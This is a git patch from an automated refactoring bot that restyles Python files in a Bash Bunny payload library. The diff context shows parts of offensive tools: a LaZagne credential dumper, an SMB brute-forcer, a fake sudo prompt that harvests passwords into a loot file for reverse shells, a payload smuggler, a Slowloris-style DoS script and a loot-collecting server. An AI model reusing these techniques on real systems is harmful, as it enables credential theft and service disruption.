From d76d34ad716ad640b5ed64cbbbddf4133cf0bde1 Mon Sep 17 00:00:00 2001
From: Sourcery AI <>
Date: Thu, 30 Nov 2023 22:35:32 +0000
Subject: [PATCH] 'Refactored by Sourcery'
---
.../library/credentials/MacPass/laZagne.py | 25 ++++++----
.../SMBruteBunny/mmcbrute/mmcbrute.py | 16 +++---
.../bushingsBlueTurtle/blueTurtle.py | 50 ++++++++-----------
.../bushingsBlueTurtle/shellSmuggler.py | 19 +++----
.../execution/bunnyDOS/bunnyDOS/systemIO | 8 +--
.../general/ALTCODE-TRANSCODER/art2bunny.py | 2 +-
.../general/BashBunny_Manager/panel/main.py | 12 ++---
.../BashBunny_Manager/panel/sites/index.py | 5 +-
.../BashBunny_Manager/panel/sites/users.py | 31 ++++++------
payloads/library/general/FICBunny/UIBEX.py | 34 ++++++-------
.../general/Windows_NIC_Sharing/server.py | 7 ++-
11 files changed, 91 insertions(+), 118 deletions(-)
diff --git a/payloads/library/credentials/MacPass/laZagne.py b/payloads/library/credentials/MacPass/laZagne.py
index 0a5babc8f..9dd6ee46b 100644
--- a/payloads/library/credentials/MacPass/laZagne.py
+++ b/payloads/library/credentials/MacPass/laZagne.py
@@ -102,20 +102,23 @@ def runLaZagne(category_selected='all', subcategories={}, password=None, interac
This function will be removed, still there for compatibility with other tools
Everything is on the config/run.py file
"""
- for pwd_dic in run_lazagne(
- category_selected=category_selected,
- subcategories=subcategories,
- password=password,
- interactive=interactive
- ):
- yield pwd_dic
+ yield from run_lazagne(
+ category_selected=category_selected,
+ subcategories=subcategories,
+ password=password,
+ interactive=interactive,
+ )
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
- parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
- help='laZagne version')
+ parser.add_argument(
+ '--version',
+ action='version',
+ version=f'Version {str(constant.CURRENT_VERSION)}',
+ help='laZagne version',
+ )
# ------------------------------------------- Permanent options ------------------------------------------
# Version and verbosity
@@ -191,7 +194,7 @@ def runLaZagne(category_selected='all', subcategories={}, password=None, interac
if categories[c]['subparser']:
parser_tab += categories[c]['subparser']
parser_tab += [PWrite]
- dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
+ dic_tmp = {c: {'parents': parser_tab, 'help': f'Run {c} module'}}
dic = dict(list(dic.items()) + list(dic_tmp.items()))
subparsers = parser.add_subparsers(help='Choose a main command')
@@ -226,7 +229,7 @@ def runLaZagne(category_selected='all', subcategories={}, password=None, interac
category_selected = args['auditType']
subcategories = clean_args(args)
- for r in runLaZagne(
+ for _ in runLaZagne(
category_selected=category_selected,
subcategories=subcategories,
password=args.get('password', None),
diff --git a/payloads/library/credentials/SMBruteBunny/mmcbrute/mmcbrute.py b/payloads/library/credentials/SMBruteBunny/mmcbrute/mmcbrute.py
index 13094ef17..b3a481d6d 100644
--- a/payloads/library/credentials/SMBruteBunny/mmcbrute/mmcbrute.py
+++ b/payloads/library/credentials/SMBruteBunny/mmcbrute/mmcbrute.py
@@ -54,11 +54,9 @@ def __init__(self, usernames, passwords, domain, target, user_as_pass=False, hon
self.len_passwords = sum((1 for _ in self.passwords))
self.passwords.seek(os.SEEK_SET)
- if self.user_as_pass and passwords is not None:
- self.len_passwords += 1
-
- elif self.user_as_pass:
- self.passwords = False
+ if self.user_as_pass:
+ if passwords is None:
+ self.passwords = False
self.len_passwords += 1
self.totals = self.len_usernames * self.len_passwords
@@ -78,8 +76,7 @@ def run(self):
user = user[-1].strip()
if self.user_as_pass:
self.update_progress()
- next_user = self.login(self.domain, user, user, smb_connection)
- if next_user:
+ if next_user := self.login(self.domain, user, user, smb_connection):
# Restablish smb_connection to avoid false positves
smb_connection.close()
smb_connection = SMBConnection(self.target, self.target)
@@ -89,8 +86,9 @@ def run(self):
self.passwords.seek(os.SEEK_SET)
for password in enumerate(self.passwords):
self.update_progress()
- next_user = self.login(self.domain, user, password[-1].strip(), smb_connection)
- if next_user:
+ if next_user := self.login(
+ self.domain, user, password[-1].strip(), smb_connection
+ ):
# Restablish smb_connection to avoid false positves
smb_connection.close()
smb_connection = SMBConnection(self.target, self.target)
diff --git a/payloads/library/credentials/bushingsBlueTurtle/blueTurtle.py b/payloads/library/credentials/bushingsBlueTurtle/blueTurtle.py
index 5470f334d..37e82dbfa 100644
--- a/payloads/library/credentials/bushingsBlueTurtle/blueTurtle.py
+++ b/payloads/library/credentials/bushingsBlueTurtle/blueTurtle.py
@@ -7,10 +7,7 @@ def cantLoadModuleError():
import sys
if sys.version_info.major < 3:
return ImportError
- if sys.version_info.minor < 6:
- return ImportError
- else:
- return ModuleNotFoundError
+ return ImportError if sys.version_info.minor < 6 else ModuleNotFoundError
def getLootFileName():
import os
@@ -22,7 +19,7 @@ def getLootFileName():
def initializeThisScript():
'''This function will be run the first time by the bunny'''
import subprocess
- import re
+ import re
pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE)
pythonExecutable = pathFinder.stdout.read().strip()
pathFinder = subprocess.Popen("which sudo".split(), stdout = subprocess.PIPE)
@@ -43,14 +40,12 @@ def initializeThisScript():
except:
pass
thisFileName = __file__
- thisFile = open(thisFileName, 'r')
- originalCode = thisFile.read()
- thisFile.close()
+ with open(thisFileName, 'r') as thisFile:
+ originalCode = thisFile.read()
newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1)
newCode = re.sub("REAL_SUDO_HERE", sudoExecutable, newCode, 1)
- thisFile = open(thisFileName, 'w')
- thisFile.write(newCode)
- thisFile.close()
+ with open(thisFileName, 'w') as thisFile:
+ thisFile.write(newCode)
createLootFile(getLootFileName())
silencePayloadFile()
quit()
@@ -58,9 +53,8 @@ def initializeThisScript():
def createLootFile(lootFileName):
import json
initialData = {}
- lootFile = open(lootFileName, 'w')
- json.dump(initialData, lootFile)
- lootFile.close()
+ with open(lootFileName, 'w') as lootFile:
+ json.dump(initialData, lootFile)
def validSudoPassword(password):
import subprocess
@@ -79,13 +73,11 @@ def silencePayloadFile(): #if there is an error making our reverse https, such
import os
payloadFileName = getPayloadFile()
if os.path.isfile(payloadFileName):
- payloadFile = open(payloadFileName, 'r')
- payload = payloadFile.read()
- payloadFile.close()
+ with open(payloadFileName, 'r') as payloadFile:
+ payload = payloadFile.read()
payload = "try:\n\t" + payload + "\nexcept:\n\tpass"
- payloadFile = open(payloadFileName, 'w')
- payloadFile.write(payload)
- payloadFile.close()
+ with open(payloadFileName, 'w') as payloadFile:
+ payloadFile.write(payload)
def blueTurtleShell(password): #we are going to give it a password here. It won't cause a problem if it is not needed, and it might be needed if the user was doing some long process for the sudo.
import subprocess
@@ -112,9 +104,9 @@ def getSudoPassword(allowedAttempts = 3):
user = getpass.getuser()
if validSudoPassword(""): #this avoids having the program ask for a password if a valid one was just entered (normal sudo behavior). Also avoids creating a bunch of reverse shells if the user is repeatedly using sudo (that could create some noise on both ends)
return (user, "", False)
- prompt = "[sudo] password for %s: " %user
+ prompt = f"[sudo] password for {user}: "
fail = "Sorry, try again."
- epicFail = "sudo: %s incorrect password attempts" %allowedAttempts
+ epicFail = f"sudo: {allowedAttempts} incorrect password attempts"
success = False
for i in range(allowedAttempts):
password = getpass.getpass(prompt)
@@ -122,7 +114,7 @@ def getSudoPassword(allowedAttempts = 3):
success = True
break
else:
- if not i == allowedAttempts - 1:
+ if i != allowedAttempts - 1:
print(fail)
if not success:
import sys
@@ -137,19 +129,17 @@ def getSudoPassword(allowedAttempts = 3):
def loadLootFile(lootFileName):
import json
try:
- file = open(lootFileName, 'r')
- data = json.load(file)
- file.close()
- return data
+ with open(lootFileName, 'r') as file:
+ data = json.load(file)
+ return data
except:
return False
def saveLootFile(loot, lootFileName):
import json
try:
- file = open(lootFileName, 'w')
- json.dump(loot, file)
- file.close()
+ with open(lootFileName, 'w') as file:
+ json.dump(loot, file)
except:
pass
diff --git a/payloads/library/credentials/bushingsBlueTurtle/shellSmuggler.py b/payloads/library/credentials/bushingsBlueTurtle/shellSmuggler.py
index ffa44b581..c9f480445 100644
--- a/payloads/library/credentials/bushingsBlueTurtle/shellSmuggler.py
+++ b/payloads/library/credentials/bushingsBlueTurtle/shellSmuggler.py
@@ -10,13 +10,11 @@ def grabEncoded(payload):
def getPayloadFromSTDIN():
import sys
- payload = sys.stdin.read()
- return payload
+ return sys.stdin.read()
def getPayloadFromFile(fileName):
- file = open(fileName, 'r')
- payload = file.read()
- file.close()
+ with open(fileName, 'r') as file:
+ payload = file.read()
return payload
def breakEncoded(encodedAttack):
@@ -25,21 +23,16 @@ def breakEncoded(encodedAttack):
return (encoded1, encoded2)
def makePrepend(encoded1, encoded2):
- rejoiner = "encodedAttack=''.join([''.join(item) for item in zip('%s','%s')]);" %(encoded1, encoded2)
- return rejoiner
+ return f"encodedAttack=''.join([''.join(item) for item in zip('{encoded1}','{encoded2}')]);"
def checkForInputFile():
import sys
args = sys.argv
if len(args) > 2:
raise RuntimeError("Only valid argument is a filename")
- if len(args) == 2:
- return args[1]
- else:
- return False
+ return args[1] if len(args) == 2 else False
-fileName = checkForInputFile()
-if fileName:
+if fileName := checkForInputFile():
payload = getPayloadFromFile(fileName)
else:
payload = getPayloadFromSTDIN()
diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO
index 554a50357..8dba93c18 100644
--- a/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO
+++ b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO
@@ -165,10 +165,7 @@ def init_socket(ip):
s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
- ua = user_agents[0]
- if args.randuseragent:
- ua = random.choice(user_agents)
-
+ ua = random.choice(user_agents) if args.randuseragent else user_agents[0]
s.send_header("User-Agent", ua)
s.send_header("Accept-language", "en-US,en,q=0.5")
return s
@@ -204,8 +201,7 @@ def main():
for _ in range(socket_count - len(list_of_sockets)):
logging.debug("Recreating socket...")
try:
- s = init_socket(ip)
- if s:
+ if s := init_socket(ip):
list_of_sockets.append(s)
except socket.error as e:
logging.debug(e)
diff --git a/payloads/library/general/ALTCODE-TRANSCODER/art2bunny.py b/payloads/library/general/ALTCODE-TRANSCODER/art2bunny.py
index 0aef3a362..d29c6b753 100644
--- a/payloads/library/general/ALTCODE-TRANSCODER/art2bunny.py
+++ b/payloads/library/general/ALTCODE-TRANSCODER/art2bunny.py
@@ -5,7 +5,7 @@
def getDict(SWITCH_POSITION):
#read ansiDict.txt file to get the bytes for the widows altcodes (ascii 128-255)
altcode = 0
- with open('/root/udisk/payloads/'+SWITCH_POSITION+'/ansiDict.txt', 'rb') as f:
+ with open(f'/root/udisk/payloads/{SWITCH_POSITION}/ansiDict.txt', 'rb') as f:
for line in f:
line = str(binascii.hexlify(line))
while line.endswith('0a') or line.endswith('0d'):
diff --git a/payloads/library/general/BashBunny_Manager/panel/main.py b/payloads/library/general/BashBunny_Manager/panel/main.py
index 39fa10f61..4f69bf232 100755
--- a/payloads/library/general/BashBunny_Manager/panel/main.py
+++ b/payloads/library/general/BashBunny_Manager/panel/main.py
@@ -31,7 +31,7 @@ def process(self, method='GET'):
sha512.update(login)
login_hash = sha512.hexdigest().lower()
credentials_path = os.path.join('credentials')
- for credential in open(credentials_path, 'r+').readlines():
+ for credential in open(credentials_path, 'r+'):
credentials = credential.split(':')
if credentials[0] == username and credentials[1].strip() == login_hash:
authenticated = True
@@ -70,7 +70,7 @@ def process(self, method='GET'):
site = getattr(getattr(module, self.path[1:]), self.path[1:])
except:
raise FileNotFoundError
-
+
inst = site()
if not hasattr(inst, method):
raise MethodNotAllowedError
@@ -88,7 +88,7 @@ def process(self, method='GET'):
else:
body = func(self)
- if body == None:
+ if body is None:
return
self.send_response(200)
except FileNotFoundError:
@@ -98,11 +98,9 @@ def process(self, method='GET'):
body = "Method not allowed"
self.send_response(405)
except Exception as e:
- body = "Unknown error"
- if DEBUG:
- body = str(e)
+ body = str(e) if DEBUG else "Unknown error"
self.send_response(502)
-
+
self.send_header('Content-type', content_type)
self.end_headers()
self.wfile.write(body)
diff --git a/payloads/library/general/BashBunny_Manager/panel/sites/index.py b/payloads/library/general/BashBunny_Manager/panel/sites/index.py
index a84928328..e341d4b07 100755
--- a/payloads/library/general/BashBunny_Manager/panel/sites/index.py
+++ b/payloads/library/general/BashBunny_Manager/panel/sites/index.py
@@ -70,8 +70,7 @@ def generatePayloadList(self):
d = os.path.join('..', '..', 'library')
categories = [f for f in os.listdir(d) if os.path.isdir(os.path.join(d, f))]
- i = 0
- for category in categories:
+ for i, category in enumerate(categories):
ret += '''
'''.format(i, category.replace('_', ' '), self.generateTable(category), self.containsArmed(category))
- i += 1
-
ret += ''
return ret
diff --git a/payloads/library/general/BashBunny_Manager/panel/sites/users.py b/payloads/library/general/BashBunny_Manager/panel/sites/users.py
index cd7099e09..a762863b4 100755
--- a/payloads/library/general/BashBunny_Manager/panel/sites/users.py
+++ b/payloads/library/general/BashBunny_Manager/panel/sites/users.py
@@ -26,35 +26,34 @@ def POST(self, data, handler):
if 'del_user' in data:
credentials_path = os.path.join('credentials')
logins = open(credentials_path, 'r+').readlines()
- credentials = []
- for login in logins:
- if len(login.strip()) > 0 and login.split(':')[0] != data['del_user'][0]:
- credentials.append(login)
- f = open(credentials_path, 'w+')
- for credential in credentials:
- f.write(credential)
- f.close()
+ credentials = [
+ login
+ for login in logins
+ if len(login.strip()) > 0
+ and login.split(':')[0] != data['del_user'][0]
+ ]
+ with open(credentials_path, 'w+') as f:
+ for credential in credentials:
+ f.write(credential)
return ''
elif 'action' in data and data['action'][0] == 'add_user':
username = data['user'][0]
password = data['pass'][0]
credentials_path = os.path.join('credentials')
logins = open(credentials_path, 'r+').readlines()
- credentials = []
sha512 = hashlib.sha512()
sha512.update('{0}:{1}'.format(username, password))
login_hash = sha512.hexdigest().lower()
- credentials.append('{0}:{1}\n'.format(username, login_hash))
+ credentials = ['{0}:{1}\n'.format(username, login_hash)]
for login in logins:
if len(login.strip()) > 0 and login.split(':')[0] != username:
credentials.append(login)
os.unlink(credentials_path)
- f = open(credentials_path, 'w+')
- for credential in credentials:
- f.write(credential)
- f.close()
+ with open(credentials_path, 'w+') as f:
+ for credential in credentials:
+ f.write(credential)
return ''
-
+
return '...'
@@ -73,7 +72,7 @@ def generateUserList(self):
credentials_path = os.path.join('credentials')
if not os.path.isfile(credentials_path):
open(credentials_path, 'w+').close()
- for login in open(credentials_path, 'r+').readlines():
+ for login in open(credentials_path, 'r+'):
user = login.split(':')[0]
ret += '''
diff --git a/payloads/library/general/FICBunny/UIBEX.py b/payloads/library/general/FICBunny/UIBEX.py
index 0fbf54ab0..c38b03690 100755
--- a/payloads/library/general/FICBunny/UIBEX.py
+++ b/payloads/library/general/FICBunny/UIBEX.py
@@ -5,7 +5,7 @@
import base64
import binascii
import struct
-import time
+import time
from io import open
try:
try:
@@ -34,15 +34,15 @@
InHeader = InFileHan.read(64)
LogFile.write(u"[{a}]: Header loaded. Checking Magic.\n".format(a=datetime.datetime.utcnow()))
try:
- assert InHeader[0:4:] == "'\x05\x19V"
+ assert InHeader[:4] == "'\x05\x19V"
except AssertionError:
LogFile.write(u"[{a}]: Assertion failed, magic is not correct.\n".format(a=datetime.datetime.utcnow()))
sys.exit(1)
LogFile.write(u"[{a}]: Magic verified.\n".format(a=datetime.datetime.utcnow()))
-InHedC = InHeader + "1"
-InHedC = InHedC[0:64:]
+InHedC = f"{InHeader}1"
+InHedC = InHedC[:64]
# Blanking CRC.
-InHedC = InHedC[0:4:] + "\x00\x00\x00\x00" + InHedC[8::]
+InHedC = InHedC[:4] + "\x00\x00\x00\x00" + InHedC[8::]
# Verify CRC.
HeaderCRC = struct.pack(">i",binascii.crc32(InHedC))
try:
@@ -67,18 +67,18 @@
LogFile.write(u"[{a}]: Both CRC's have been verified. Extraction complete.\n".format(a=datetime.datetime.utcnow()))
LogFile.write(u"[{a}]: Here is header information:\n".format(a=datetime.datetime.utcnow()))
HeaderDataT = [
- (u"Image Header Magic Number",base64.b16encode(InHeader[0:4]).decode()),
- (u"Image Header CRC Checksum",base64.b16encode(InHeader[4:8]).decode()),
- (u"Image Creation Timestamp",base64.b16encode(InHeader[8:12]).decode()),
- (u"Image Data Size",base64.b16encode(InHeader[12:16]).decode()),
- (u"Data Load Address",base64.b16encode(InHeader[16:20]).decode()),
- (u"Entry Point Address",base64.b16encode(InHeader[20:24]).decode()),
- (u"Image Data CRC Checksum",base64.b16encode(InHeader[24:28]).decode()),
- (u"Operating System",ord(InHeader[28])),
- (u"CPU architecture",ord(InHeader[29])),
- (u"Image Type",ord(InHeader[30])),
- (u"Compression Type",ord(InHeader[31])),
- (u"Image Name",InHeader[32::].split("\x00")[0].decode())
+ (u"Image Header Magic Number", base64.b16encode(InHeader[:4]).decode()),
+ (u"Image Header CRC Checksum", base64.b16encode(InHeader[4:8]).decode()),
+ (u"Image Creation Timestamp", base64.b16encode(InHeader[8:12]).decode()),
+ (u"Image Data Size", base64.b16encode(InHeader[12:16]).decode()),
+ (u"Data Load Address", base64.b16encode(InHeader[16:20]).decode()),
+ (u"Entry Point Address", base64.b16encode(InHeader[20:24]).decode()),
+ (u"Image Data CRC Checksum", base64.b16encode(InHeader[24:28]).decode()),
+ (u"Operating System", ord(InHeader[28])),
+ (u"CPU architecture", ord(InHeader[29])),
+ (u"Image Type", ord(InHeader[30])),
+ (u"Compression Type", ord(InHeader[31])),
+ (u"Image Name", InHeader[32::].split("\x00")[0].decode()),
]
for x in HeaderDataT:
LogFile.write(u"{x0}: {x1}\n".format(x0=x[0],x1=x[1]))
diff --git a/payloads/library/general/Windows_NIC_Sharing/server.py b/payloads/library/general/Windows_NIC_Sharing/server.py
index 74b623de9..e2b9bdf9a 100644
--- a/payloads/library/general/Windows_NIC_Sharing/server.py
+++ b/payloads/library/general/Windows_NIC_Sharing/server.py
@@ -35,16 +35,15 @@ def do_POST(self):
content_length = int(self.headers['Content-Length'])
filename = self.path[1:]
+ data = self.rfile.read(content_length)
if filename == 'EOF':
- data = self.rfile.read(content_length)
- with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f:
+ with open(f"{CURR_DIR}/loot/{filename}", "w+") as f:
f.write(data)
f.close()
self.end_headers()
IS_RUNNING = False
else:
- data = self.rfile.read(content_length)
- with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f:
+ with open(f"{CURR_DIR}/loot/{filename}.txt", "w+") as f:
f.write(data)
f.close()
self._set_headers()